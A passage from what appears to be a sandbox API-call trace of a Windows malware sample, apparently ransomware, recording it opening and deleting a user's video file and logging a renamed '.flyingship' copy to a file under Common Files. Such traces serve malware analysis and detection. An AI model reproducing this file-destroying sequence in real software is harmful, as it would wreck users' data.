lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.747] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.747] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\gwljrbpo46x9neds.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0192.748] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.748] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.748] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.748] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.748] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.749] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.749] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.749] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.749] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.749] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.750] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.750] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFilePart=0x0) returned 0x47 [0192.750] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x18168d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0x90af58 [0192.750] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\gwljrbpo46x9neds.mkv")) returned 1 [0192.752] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x18168d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0 [0192.753] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.756] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.757] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.757] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.757] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.757] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.757] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.757] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.757] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.758] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.758] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.758] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.758] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.758] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.759] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.759] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.759] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.759] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.759] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.759] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x34af, lpOverlapped=0x0) returned 1 [0192.759] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.760] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x34af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.760] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0192.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x55) returned 0x8c4a48 [0192.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\n", cchWideChar=85, lpMultiByteStr=0x8c4a48, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 85 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0192.760] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x54, lpOverlapped=0x0) returned 1 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.760] CloseHandle (hObject=0x158) returned 1 [0192.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.764] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.765] RtlAllocateHeap 